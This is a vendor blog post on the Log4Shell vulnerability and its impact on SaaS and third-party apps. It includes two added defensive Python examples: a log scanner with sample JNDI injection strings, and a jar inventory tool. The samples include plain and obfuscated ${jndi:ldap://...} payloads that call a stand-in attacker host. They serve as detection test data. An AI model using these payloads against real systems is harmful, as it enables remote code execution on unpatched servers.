How Log4j May Impact Your SaaS and 3rd-Party Apps - and What You Can Do
Log4Shell (CVE-2021-44228) is a critical vulnerability in Log4j, a widely used Java logging library, and its impact is far-reaching and costly. Organizations of all sizes, from small online retailers to the most recognized brands to government agencies, are affected. One of AppOmni’s core values is to build trust with transparency, which includes offering information and perspective about security issues. Read on for our take on the Log4j vulnerability and what organizations can do to protect their systems.
What is Log4j?
Log4j 2 is an open-source, Java-based logging framework maintained by the Apache Software Foundation. It is embedded in a great deal of commercial and in-house software and runs wherever Java runs, including Windows, Linux, and macOS. A critical vulnerability in Log4j 2 (CVE-2021-44228, widely called Log4Shell) was reported to Apache in late November 2021 and disclosed publicly in early December 2021. The flaw is in Log4j’s message lookup feature: when a vulnerable version logs a string containing a JNDI lookup such as ${jndi:ldap://attacker-controlled-host/x}, it contacts that host and can end up loading attacker-supplied code. Any attacker who can get such a string written to a log, for example through a User-Agent header, a username field, or a chat message, can therefore achieve remote code execution without authenticating, and the vulnerability is being exploited by bad actors worldwide.
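Because the attack string travels inside ordinary request fields, the first thing most teams did was grep their logs for ${jndi:. Attackers quickly started hiding the string behind Log4j’s own lookup syntax (${lower:j}, ${::-j}) and URL encoding, so a useful check has to normalise those tricks first. The following Python is an added example written for this article, not code from AppOmni or from the Log4j project; the log lines are constructed samples using reserved documentation addresses, and the list of JNDI schemes it recognises is the one the checker assumes, not an exhaustive one.

```python
"""Flag Log4Shell (CVE-2021-44228) lookup strings in log lines, including the common
obfuscations used to evade a naive '${jndi:' match. Added example, constructed input."""
import re
from urllib.parse import unquote

# ${lower:x} / ${upper:x} -> x   (case is normalised at the end anyway)
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${anything:-x} -> x   covers ${::-x}, ${env:NOPE:-x}, ${sys:NOPE:-x} and friends
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# After normalisation a probe looks like ${jndi:<scheme>:...}; capture the scheme.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]*)")


def normalize_lookups(text, max_rounds=10):
    """Undo percent-encoding (possibly repeated) and collapse nested case/default
    lookups, innermost first, until the string stops changing."""
    for _ in range(max_rounds):
        collapsed = unquote(text)
        collapsed = CASE_LOOKUP.sub(lambda m: m.group(1), collapsed)
        collapsed = DEFAULT_LOOKUP.sub(lambda m: m.group(1), collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text.lower()


def jndi_scheme(text):
    """Return the JNDI scheme ('ldap', 'rmi', 'dns', ... or '' when none is given)
    if the line carries a ${jndi:...} lookup after normalisation, else None."""
    match = JNDI_LOOKUP.search(normalize_lookups(text))
    return match.group(1) if match else None


def scan_lines(lines):
    """(line number, scheme, raw line) for every line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        scheme = jndi_scheme(line)
        if scheme is not None:
            hits.append((number, scheme, line))
    return hits


# Constructed access-log lines (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LINES = [
    # plain probe in the User-Agent field
    '203.0.113.7 - - [10/Dec/2021:01:02:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://x.attacker.example/a}"',
    # case-lookup obfuscation
    '203.0.113.7 - - [10/Dec/2021:01:02:04 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${lower:l}dap://x.attacker.example/a}"',
    # default-value obfuscation
    '203.0.113.7 - - [10/Dec/2021:01:02:05 +0000] "GET /api HTTP/1.1" 404 0 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://x.attacker.example/a}"',
    # percent-encoded probe in the request path
    '203.0.113.7 - - [10/Dec/2021:01:02:06 +0000] '
    '"GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fx.attacker.example%2Fa%7D HTTP/1.1" 200 12 "-" "curl/7.79"',
    # benign lines: the word jndi without a lookup, and a lookup that is not jndi
    '198.51.100.9 - - [10/Dec/2021:01:02:07 +0000] "GET /docs/jndi-ldap-config HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Dec/2021:01:02:08 +0000] "GET /?path=${HOME}/bin HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, scheme, line in scan_lines(SAMPLE_LINES):
        print(f"line {number}: jndi scheme={scheme or '?'}  {line}")
```

The normalisation loop is the part worth keeping: a single regex for ${jndi: misses every one of the obfuscated samples above, while collapsing lookups until a fixpoint catches them regardless of how deeply they are nested. A hit only tells you a probe was received; whether the logging component was actually vulnerable is a separate question answered by the version inventory.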
Are SaaS applications impacted?
Many technologies are impacted, including firewalls, servers, video conferencing platforms, and more. SaaS applications are also impacted: many SaaS vendors run Log4j somewhere in their platform and are working to mitigate impacts to their customers. CISA maintains a list of software with its Log4j vulnerability status along with links to vendor updates.
Are third-party apps affected?
Third-party integrations into SaaS applications may also be vulnerable, and the consequences are amplified by what these integrations are allowed to do. Many of them can read, write, and delete sensitive data, and they can also reach user groups, workspaces, or multiple systems in the corporate network. Third-party apps bring their own governance problems: it is often unclear which apps are approved, what permissions each app holds, who can install an app, and what users are doing with the data those apps access.
What are the potential impacts on SaaS applications?
There are a few ways a Log4j compromise could affect SaaS applications:
- An attacker who gains code execution through Log4j could change access and/or security settings within a SaaS application, for example by turning off encryption or granting someone access to data they should not have.
- Data, including usernames and passwords, could be exported, deleted, or otherwise compromised.
- Data can also be compromised through third-party apps, such as Data Loader in Salesforce or other apps installed through application-specific marketplaces, if those apps embed a vulnerable Log4j.
- Other Log4j-related vulnerabilities continue to be discovered, and the initial fix release was itself found to be incomplete, so a single patch may not be the end of the work.
Who is responsible for ensuring all vulnerabilities are secured: SaaS vendors or SaaS customers?
SaaS security follows a shared responsibility model, which means both vendors and customers are responsible for security. SaaS vendors are responsible for offering secure products and services, and they generally do this well: they invest heavily in security and employ some of the best teams in the world. But the responsibility for configuring, managing, and actually using the product ultimately lies with the customer.
When it comes to Log4j, most of the responsibility falls to SaaS vendors: they must determine whether their products are affected and, if they are, patch and mitigate the vulnerability. But that doesn’t mean SaaS customers are powerless until their vendor acts. Visibility into the systems and applications in use is critical to determining an organization’s level of risk.
What should SaaS customers be doing to protect themselves?
There are a few things customers can do to protect their systems and data, including:
- Inventory and audit all SaaS applications, including third-party applications. Make sure the IT and security teams have visibility into every SaaS app in use, especially those connected by end users without IT involvement.
- Get an understanding of exactly what those third-party apps can do: the totality of access granted through OAuth scopes, which SaaS apps and data they can reach, and whether that access is still needed.
- Check the CISA site for the list of applications with their Log4j vulnerability status and information on vendor updates.
- Update as many of your own systems as you can, as quickly as possible, to versions that contain the fix; this includes self-hosted Java tooling and desktop utilities that connect to your SaaS tenants.
- Implement a solid SaaS Security Posture Management (SSPM) tool to increase your visibility and keep you informed. Continuous monitoring is essential to alert admins when access levels change or encryption is turned off, which is exactly the kind of change an attacker could make after a Log4j compromise.
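For the systems a customer controls, the inventory step above comes down to finding every copy of log4j-core, including copies bundled inside WAR and EAR files, and deciding whether each one is fixed, still vulnerable, or mitigated by the JndiLookup.class removal that Apache recommended when upgrading was not possible. The following Python is an added example written for this article, not a tool from AppOmni or Apache. It reads the version from each jar’s manifest (falling back to the file name), checks for the JndiLookup class, and, for the demo, builds constructed stand-in jars in a temporary directory rather than touching real software.

```python
"""Inventory log4j-core JARs under a directory tree and classify each against
CVE-2021-44228, looking one level inside WAR/EAR files too. Added example."""
import io
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_JAR_RE = re.compile(r"log4j-core-(\d[\w.\-]*)\.jar$")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Pre-release tags are dropped,
    which is safe here: every 2.0 pre-release with the lookup feature (beta9 on) is vulnerable."""
    numbers = [int(p) for p in text.split("-")[0].split(".") if p.isdigit()]
    return tuple((numbers + [0, 0, 0])[:3])


def has_44228_fix(version):
    """True when the release carries the CVE-2021-44228 fix: 2.15.0 or later on the main
    line, or the Java 7 / Java 6 backport branches 2.12.2+ and 2.3.1+."""
    major, minor, patch = version
    if (major, minor) == (2, 12):
        return patch >= 2
    if (major, minor) == (2, 3):
        return patch >= 1
    return version >= (2, 15, 0)


def manifest_version(zf):
    """Implementation-Version from META-INF/MANIFEST.MF, or None when absent."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def assess_core_jar(zf, label):
    """Classify one log4j-core jar as PATCHED, VULNERABLE, or MITIGATED (class removed)."""
    name_match = CORE_JAR_RE.search(label)
    version_text = manifest_version(zf) or (name_match.group(1) if name_match else "0.0.0")
    jndi_present = JNDI_LOOKUP_CLASS in zf.namelist()
    if has_44228_fix(parse_version(version_text)):
        status = "PATCHED"
    elif jndi_present:
        status = "VULNERABLE"
    else:
        status = "MITIGATED (JndiLookup.class removed)"
    return {"path": label, "version": version_text, "jndi_lookup_present": jndi_present, "status": status}


def scan_archive(source, label, depth=0):
    """Findings for one archive, plus any log4j-core jar bundled one level down."""
    findings = []
    try:
        zf = zipfile.ZipFile(source)
    except zipfile.BadZipFile:
        return findings
    with zf:
        if CORE_JAR_RE.search(label):
            findings.append(assess_core_jar(zf, label))
        if depth < 1:
            for entry in zf.namelist():
                if CORE_JAR_RE.search(entry):
                    findings.extend(scan_archive(io.BytesIO(zf.read(entry)), f"{label}!/{entry}", depth + 1))
    return findings


def scan_tree(root):
    """Walk a directory and return findings for every jar/war/ear/zip in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".jar", ".war", ".ear", ".zip")):
                path = os.path.join(dirpath, name)
                findings.extend(scan_archive(path, path))
    return findings


def build_demo_jar(target, version, include_jndi_lookup):
    """Constructed stand-in for a log4j-core jar: a manifest plus an empty placeholder class entry."""
    with zipfile.ZipFile(target, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"")


def run_demo():
    """Build constructed sample archives in a temp dir and return {relative path: status}."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_jar(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1", True)
        build_demo_jar(os.path.join(root, "log4j-core-2.14.1-stripped.jar"), "2.14.1", False)
        build_demo_jar(os.path.join(root, "log4j-core-2.17.1.jar"), "2.17.1", True)
        nested = io.BytesIO()
        build_demo_jar(nested, "2.12.1", True)  # vulnerable copy hidden inside a WAR
        with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
            war.writestr("WEB-INF/lib/log4j-core-2.12.1.jar", nested.getvalue())
        return {f["path"][len(root) + 1:]: f["status"] for f in scan_tree(root)}


if __name__ == "__main__":
    for path, status in sorted(run_demo().items()):
        print(f"{status:40} {path}")
```

Point scan_tree at an application directory rather than the demo to use it for real. The version check is deliberately branch-aware, because a 2.12.x or 2.3.x jar is not automatically behind a 2.15.0 one, and the MITIGATED state matters for tooling you cannot upgrade yet: it records that the class is gone rather than reporting a false alarm on the old version number.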
How does AppOmni protect its customers from Log4j?
Most security teams find it challenging to secure heterogeneous SaaS environments, because each application demands real depth of expertise. It can be difficult even to answer a simple question such as: “Has my SaaS environment been compromised and, if so, how?” AppOmni’s continuous SaaS security monitoring delivers instant visibility into SaaS configuration drift and removes that burden from security teams by providing SaaS audit log monitoring and detection across business-critical SaaS applications. Abnormal or inappropriate activity of the kind that would follow a Log4j compromise of a SaaS environment (suspicious logins, configuration changes, brute-force attempts, unusual data access, bulk exfiltration or deletion) is discovered automatically through built-in detections on SaaS application events.
AppOmni also protects against third-party app vulnerabilities. AppOmni can inventory and monitor the third-party apps and OAuth grants connected and integrated into SaaS environments to provide visibility into any Log4j-associated changes that could compromise systems.
Is AppOmni software vulnerable to Log4j?
No. Log4j is not a component of the AppOmni platform, so the AppOmni product is not vulnerable to CVE-2021-44228.
Find out who has access to your SaaS data
AppOmni’s SaaS security management platform gives security and IT teams an easy and automated way to secure their SaaS data and environments.
Get A Free Risk Assessment
Misconfiguration is a leading cause of SaaS data breaches.
AppOmni’s research shows that 95% of companies have external users with over-privileged access to data, and more than 55% of companies have sensitive data that’s inadvertently exposed to the anonymous internet.
Our risk assessment delivers visibility into who and what has access to your SaaS data and will help determine whether your security configurations match your business intent.